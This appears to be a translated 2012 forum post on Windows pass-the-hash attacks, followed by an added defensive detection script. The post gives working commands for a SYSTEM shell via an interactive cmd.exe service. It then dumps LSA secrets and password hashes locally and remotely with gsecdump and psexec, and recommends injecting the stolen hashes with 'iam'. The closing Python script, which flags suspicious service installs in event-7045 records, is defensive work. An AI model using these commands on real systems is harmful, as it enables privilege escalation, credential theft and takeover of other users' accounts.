HASH injection attack

Posted by the original poster on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the HASH information just captured with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are formidable; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, never actually need the password to be cracked at all; this is simply a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
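As an added defender-side example that is not part of the original post: the first step above (sc create with cmd.exe as the binpath and an interactive service type) and the later psexec -s run are both service installs, and a service install is recorded in the Windows System log as event 7045. The script below runs a simple triage over constructed records whose field names are modelled on that event (ServiceName, ImagePath, ServiceType, StartType, AccountName) and flags installs whose image is a shell interpreter, whose type is interactive, or whose name is PsExec's PSEXESVC; the sample records are constructed, not real telemetry.

```python
import re

# Constructed sample records modelled on Windows System log event 7045
# ("A service was installed in the system"). Not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "shellcmdline",
     "ImagePath": "C:\\WINDOWS\\system32\\cmd.exe /K start",
     "ServiceType": "user mode service (interactive)",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
     "ServiceType": "user mode service",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Backup Agent",
     "ImagePath": '"C:\\Program Files\\Vendor\\agent.exe" --service',
     "ServiceType": "user mode service",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    # A 7036 (service state change) record, which the triage must ignore.
    {"EventID": 7036, "ServiceName": "Spooler",
     "ImagePath": "", "ServiceType": "", "StartType": "", "AccountName": ""},
]

# Interpreters that should almost never be the image of a service.
SHELL_IMAGES = re.compile(
    r'(^|[\\/"\s])(cmd|powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b', re.I)


def classify(event):
    """Return the reasons an install looks suspicious (empty list if benign)."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    if SHELL_IMAGES.search(event["ImagePath"]):
        reasons.append("shell as service image")
    if "interactive" in event["ServiceType"].lower():
        reasons.append("interactive service type")
    if event["ServiceName"].upper() == "PSEXESVC":
        reasons.append("psexec service install")
    return reasons


def suspicious_installs(events):
    """Map service name -> reasons for every flagged 7045 record."""
    return {e["ServiceName"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for name, why in suspicious_installs(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(why)}")
```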